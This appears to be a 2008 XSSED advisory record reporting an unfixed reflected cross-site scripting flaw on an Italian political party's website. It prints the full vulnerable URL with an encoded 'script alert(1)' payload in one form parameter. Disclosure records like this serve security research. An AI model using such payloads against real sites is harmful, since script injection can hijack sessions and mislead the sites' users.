Unfixed XSS vulnerability at italiadeivalori.antoniodipietro.com

2008-09-06T00:00:00
ID XSSED:41502
Type xssed
Reporter Hanno Boeck
Modified 2008-09-07T00:00:00

Description

Security researcher Hanno Boeck submitted on 09/06/2008 a cross-site scripting (XSS) vulnerability affecting italiadeivalori.antoniodipietro.com, which at the time of submission ranked 38252 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://italiadeivalori.antoniodipietro.com/iosostengo/inviomailgen.php?tuonome=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&text=Aiutami+a+diffondere+il+video+del+discorso+di+Antonio+Di+Pietro+alla+Camera+dei+Deputati.+Leggi+il+testo+della+dichiarazione+di+voto+dell%E2%80%99Italia+dei+Valori+per+la+fiducia+al+Governo%2C+fiducia+che+non+%C3%A8+stata+data.+Il+discorso+ha+reso+palese+un+fatto+importante%3A+esiste+un%E2%80%99unica+opposizione%2C+quella+dell%E2%80%99Italia+dei+Valori.&tuamail=s&mail1=s&mail2=&mail3=